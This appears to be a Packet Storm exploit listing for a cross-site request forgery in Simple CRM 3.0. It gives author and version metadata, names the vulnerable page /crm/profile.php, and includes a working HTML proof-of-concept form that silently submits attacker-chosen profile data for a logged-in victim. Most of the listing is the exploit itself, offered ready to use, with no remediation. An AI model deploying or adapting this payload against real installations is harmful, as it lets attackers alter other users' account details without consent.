Simple CRM version 3.0 suffers from a cross site request forgery vulnerability.
741d9fd8dad667036c63d51b8adfd04382877a86716d2812aaa1281222fd0718# Exploit Title: Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF)
# Date: 20/06/2021
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Simple CRM suffers from Cross-site request forgery, which the attacker can manipulate user data via triggering user to visit suspicious url
Vulnerable page: /crm/profile.php
POC:
----
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/crm/profile.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="name" value="test" />
<input type="hidden" name="alt_email" value="" />
<input type="hidden" name="phone" value="0123456789" />
<input type="hidden" name="gender" value="m" />
<input type="hidden" name="address" value="jgjgjgjjggjcsrf" />
<input type="hidden" name="update" value="Update" />
<input type="submit" value="Exploit" />
</form>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed